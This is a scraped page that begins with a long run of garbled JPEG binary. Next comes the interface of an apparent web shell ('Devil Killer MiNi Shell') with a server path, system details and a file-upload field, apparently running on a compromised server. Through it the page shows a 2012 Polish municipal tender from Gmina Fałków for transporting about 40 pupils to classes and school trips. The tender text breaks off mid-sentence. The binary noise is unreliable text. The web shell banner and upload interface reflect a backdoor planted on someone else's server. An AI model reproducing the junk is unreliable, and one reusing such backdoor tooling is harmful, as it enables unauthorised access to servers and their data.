JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121221/524768-N-2012.html

<p class="kh_header"><b>Fałków: Świadczenie usług transportowych w Projekcie współfinansowanym z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 524768 - 2012; data zamieszczenia: 21.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Fałków , ul. Zamkowa 1A, 26-260 Fałków, woj. świętokrzyskie, tel. 44 7873535, faks 44 7873535.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportowych w Projekcie współfinansowanym z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1. Odwóz uczniów po zajęciach pozalekcyjnych i wyrównawczych
Przedmiotem zamówienia jest odwóz uczniów po zajęciach pozalekcyjnych i wyrównawczych ze szkół podstawowych i gimnazjum z terenu gminy Fałków w ramach projektu pn. Edukacja podstawą sukcesu Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX Działanie 9.1, Poddziałanie 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. Przedmiot zamówienia obejmuje  odwóz uczniów po zakończeniu zajęć projektowych spod szkoły podstawowej i gimnazjum w Fałkowie oraz spod szkoły podstawowej w Czermnie do miejscowości zamieszkania uczniów znajdujących się na terenie gminy Fałków. Powyższe usługi będą wykonywane środkami transportu Wykonawcy posiadającymi ważne badania techniczne gwarantującymi bezpieczny przewóz uczniów. Zamawiający we własnym zakresie zapewni opiekę nad uczniami. Odwóz uczniów odbywać się będzie 3 razy w tygodniu, w dniach od poniedziałku do środy zgodnie ze szczegółowym harmonogramem w poszczególnych szkołach w czasie trwania projektu, tj od dnia podpisania umowy do 30.06.2013r. Ponadto zamówienie obejmuje usługę dowozu uczniów na dwa obozy językowe (z Fałkowa do Kielc lub z Fałkowa do Piotrkowa Trybunalskiego - odległość jest porównywalna a miejsce dowozu zostanie ustalone w chwili organizacji obozu)
- Planowana liczba kilometrów w Projekcie - 5188 km - Szacunkowa ilość kilometrów, która nie stanowi podstawy do rozliczenia. Rozliczenie nastąpi na podstawie faktycznie przejechanych kilometrów
- Ilość dzieci odwożonych po zajęciach i wyjeżdżających na obozy językowe-ok. 40.
Wykonawca pokrywa dojazdu autokaru do miejsca wykonywania usług oraz powrót autokaru do bazy Wykonawcy.
Zamawiający zastrzega sobie prawo zmiany harmonogramu związanego z odwozem uczestników na zajęcia. 
Wykonawca zobowiązuje się w przypadku awarii pojazdu lub innych nieprzewidzianych okoliczności zależnych od Wykonawcy, wykonać na własny koszt usługę zastępczą, aby odwóz dzieci mógł odbyć się terminowo. 
Wykonawca w celu prawidłowego wykonania zamówienia zobowiązany jest posiadać odpowiednie ubezpieczenie od następstw nieszczęśliwych wypadków.
Płatność odbywać się będzie miesięcznie na podstawie zaakceptowanej przez Zamawiającego faktury VAT. Podstawę wystawienia faktury VAT stanowić będzie miesięczny wykaz przejechanych kilometrów potwierdzonych przez Koordynatora Projektu.. Należność na wystawionej fakturze VAT, stanowić będzie iloczyn przejechanych kilometrów oraz koszt jednostkowy za przejechanie 1 km.
Płatność 30 dni od momentu dostarczenia faktury VAT Zamawiającemu.
Wykonawca w cenie ofertowej musi uwzględnić wszelkie koszty niezbędne do prawidłowego wykonania przedmiotu zamówienia.
Wykonawca jest zobowiązany wykonać zamówienie w terminie do 30.06.2013 r.

Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 6a do SIWZ.

Zadanie 2 Transport uczniów na wycieczki 
Przedmiotem zamówienia jest transport uczniów w ramach projektu pn. Edukacja podstawą sukcesu Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX Działanie 9.1, Poddziałanie 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych na wycieczki. Przedmiot zamówienia obejmuje dwa jednodniowe wyjazdy edukacyjne w ramach zajęć projektowych z grupą ok. 40 dzieci z Fałkowa do Warszawy i z Fałkowa do Krakowa oraz jeden wyjazd trzydniowy z Fałkowa w Tatry (m.in.Zakopane) z grupą ok. 40 dzieci.
Przewidywana łączna liczba kilometrów w okresie realizacji zadania w Projekcie - ok.1400 km- Szacunkowa ilość kilometrów, która nie stanowi podstawy do rozliczenia. Rozliczenie nastąpi na podstawie faktycznie przejechanych kilometrów

Wykonawca pokrywa dojazdu autokaru do miejsca wykonywania usług oraz powrót autokaru do bazy Wykonawcy.
Zamawiający zastrzega sobie prawo zmiany harmonogramu związanego z odwozem uczestników na zajęcia. 
Wykonawca zobowiązuje się w przypadku awarii pojazdu lub innych nieprzewidzianych okoliczności zależnych od Wykonawcy, wykonać na własny koszt usługę zastępczą, aby odwóz dzieci mógł odbyć się terminowo. 
Wykonawca w celu prawidłowego wykonania zamówienia zobowiązany jest posiadać odpowiednie ubezpieczenie od następstw nieszczęśliwych wypadków.
Płatność odbywać się będzie miesięcznie na podstawie zaakceptowanej przez Zamawiającego faktury VAT. Podstawę wystawienia faktury VAT stanowić będzie wykaz przejechanych kilometrów potwierdzonych przez Koordynatora Projektu. Należność na wystawionej fakturze VAT, stanowić będzie iloczyn przejechanych kilometrów i ceny jednostkowej za przejechanie 1 km. 
Płatność 30 dni od momentu dostarczenia faktury VAT Zamawiającemu.
Wykonawca w cenie ofertowej musi uwzględnić wszelkie koszty niezbędne do prawidłowego wykonania przedmiotu zamówienia.
Wykonawca jest zobowiązany wykonać zamówienie w terminie do 31.08.2013 r.

Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 6b do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien przedstawić aktualną koncesję, zezwolenie lub licencję na wykonywanie przewozu osób,
wydaną na podstawie ustawy z dnia 6 września 2001 roku o transporcie drogowym Dz. U. Nr 125, poz. 1371,
ważną na dzień składania oferty. Zamawiający oceni warunek jako spełniony wg formuły spełnia/nie spełnia,
w oparciu o dostarczone dokumenty oraz oświadczenie - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek jako spełniony wg formuły spełnia/nie spełnia, w oparciu o oświadczenie -
załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi, że posiada lub będzie posiadał: co najmniej 1 autobus z co najmniej 46 miejscami
siedzącymi. Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli przedstawi: - wykaz
pojazdów, które zostaną użyte przy realizacji zamówienia wraz kopią dowodu rejestracyjnego.
Zamawiający oceni warunek jako spełniony wg formuły spełnia/nie spełnia, w oparciu o przedstawiony
wykaz sprzętu stanowiący załącznik nr 5 do SIWZ wraz z kopiami dowodów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi, że dysponuje lub będzie dysponował co najmniej 1 kierowcą z uprawnieniami do
prowadzenia pojazdów kat. D. Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli przedstawi: -
wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w
wykonywaniu zamówienia, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu
zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich
uprawnień Zamawiający oceni warunek jako spełniony wg formuły spełnia/nie spełnia, w oparciu o wykaz
osób które będą uczestniczyć w realizacji zamówienia ( załącznik nr 4 do SIWZ) oraz oświadczenie -
załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi, że posiada odpowiednie ubezpieczenie od następstw nieszczęśliwych wypadków.
Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli przedstawi kopie opłaconych polis.
Zamawiający oceni warunek jako spełniony wg formuły spełnia/nie spełnia, w oparciu o przedstawione
polisy ubezpieczeniowe oraz oświadczenie - załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, Wykaz posiadanych pojazdów wraz z kopiami dowodów rejestracyjnych, kopia polisy
ubezpieczenia od następstw nieszczęśliwych wypadków, kopia koncesji, zezwolenia lub licencji na wykonywanie
przewozu osób, Wykaz osób zdolnych do wykonania zamówienia-kierowców,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, w
następujących warunkach: 1) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie
mającym wpływ na realizację przedmiotu zamówienia; 2) gdy konieczność wprowadzenia zmian będzie następstwem
zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności
instytucją Zarządzającą, Pośredniczącą, a także innymi instytucjami, które na podstawie przepisów prawa mogą
wpływać na realizację zamówienia; 3) gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych
dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji
Pośredniczącej; 4) gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcie jego
celów według pierwotnie przyjętego harmonogramu realizacji zamówienia; 5) zmiana wynagrodzenia Wykonawcy (w
tym cen jednostkowych) brutto, w przypadku zmiany przepisów obowiązujących dot. podatku VAT, 6) Zamawiający
przewiduje możliwość dokonania zmiany części wykonywanego przez niego zakresu usługi, 7) Zamawiający
przewiduje możliwość zmiany trasy i ilość kilometrów w przypadku wystąpienia okoliczności wymagających jej
dokonanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.falkow.asi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Fałkowie, ul.Zamkowa
1A, 26-260 Fałków-pok.202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2013 godzina 10:00, miejsce: Urząd Gminy w Fałkowie, ul.Zamkowa
1A, 26-260 Fałków-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Społecznego w
ramach Programu Operacyjnego Kapitał Ludzki, projekt pn: Edukacja podstawą sukcesu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odwóz uczniów po zajęciach pozalekcyjnych i wyrównawczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odwóz uczniów
po zajęciach pozalekcyjnych i wyrównawczych ze szkół podstawowych i gimnazjum z terenu gminy Fałków w
ramach projektu pn. Edukacja podstawą sukcesu Projekt współfinansowany ze środków Unii Europejskiej w
ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX Działanie 9.1,
Poddziałanie 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz
zmniejszenie różnic w jakości usług edukacyjnych. Przedmiot zamówienia obejmuje odwóz uczniów po
zakończeniu zajęć projektowych spod szkoły podstawowej i gimnazjum w Fałkowie oraz spod szkoły
podstawowej w Czermnie do miejscowości zamieszkania uczniów znajdujących się na terenie gminy Fałków.
Powyższe usługi będą wykonywane środkami transportu Wykonawcy posiadającymi ważne badania techniczne
gwarantującymi bezpieczny przewóz uczniów. Zamawiający we własnym zakresie zapewni opiekę nad uczniami.
Odwóz uczniów odbywać się będzie 3 razy w tygodniu, w dniach od poniedziałku do środy zgodnie ze
szczegółowym harmonogramem w poszczególnych szkołach w czasie trwania projektu, tj od dnia podpisania
umowy do 30.06.2013r. Ponadto zamówienie obejmuje usługę dowozu uczniów na dwa obozy językowe (z
Fałkowa do Kielc lub z Fałkowa do Piotrkowa Trybunalskiego - odległość jest porównywalna a miejsce dowozu
zostanie ustalone w chwili organizacji obozu) - Planowana liczba kilometrów w Projekcie - 5188 km - Szacunkowa
ilość kilometrów, która nie stanowi podstawy do rozliczenia. Rozliczenie nastąpi na podstawie faktycznie
przejechanych kilometrów - Ilość dzieci odwożonych po zajęciach i wyjeżdżających na obozy językowe-ok. 40.
Wykonawca pokrywa dojazdu autokaru do miejsca wykonywania usług oraz powrót autokaru do bazy
Wykonawcy. Zamawiający zastrzega sobie prawo zmiany harmonogramu związanego z odwozem uczestników na
zajęcia. Wykonawca zobowiązuje się w przypadku awarii pojazdu lub innych nieprzewidzianych okoliczności
zależnych od Wykonawcy, wykonać na własny koszt usługę zastępczą, aby odwóz dzieci mógł odbyć się
terminowo. Wykonawca w celu prawidłowego wykonania zamówienia zobowiązany jest posiadać odpowiednie
ubezpieczenie od następstw nieszczęśliwych wypadków. Płatność odbywać się będzie miesięcznie na podstawie
zaakceptowanej przez Zamawiającego faktury VAT. Podstawę wystawienia faktury VAT stanowić będzie
miesięczny wykaz przejechanych kilometrów potwierdzonych przez Koordynatora Projektu.. Należność na
wystawionej fakturze VAT, stanowić będzie iloczyn przejechanych kilometrów oraz koszt jednostkowy za
przejechanie 1 km. Płatność 30 dni od momentu dostarczenia faktury VAT Zamawiającemu. Wykonawca w cenie
ofertowej musi uwzględnić wszelkie koszty niezbędne do prawidłowego wykonania przedmiotu zamówienia.
Wykonawca jest zobowiązany wykonać zamówienie w terminie do 30.06.2013 r. Pozostałe warunki dotyczące
realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 6a do SIWZ...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Transport uczniów na wycieczki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest transport
uczniów w ramach projektu pn. Edukacja podstawą sukcesu Projekt współfinansowany ze środków Unii
Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX
Działanie 9.1, Poddziałanie 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do
edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych na wycieczki. Przedmiot zamówienia obejmuje
dwa jednodniowe wyjazdy edukacyjne w ramach zajęć projektowych z grupą ok. 40 dzieci z Fałkowa do
Warszawy i z Fałkowa do Krakowa oraz jeden wyjazd trzydniowy z Fałkowa w Tatry (m.in.Zakopane) z grupą ok.
40 dzieci. Przewidywana łączna liczba kilometrów w okresie realizacji zadania w Projekcie - ok.1400 km-
Szacunkowa ilość kilometrów, która nie stanowi podstawy do rozliczenia. Rozliczenie nastąpi na podstawie
faktycznie przejechanych kilometrów Wykonawca pokrywa dojazdu autokaru do miejsca wykonywania usług
oraz powrót autokaru do bazy Wykonawcy. Zamawiający zastrzega sobie prawo zmiany harmonogramu
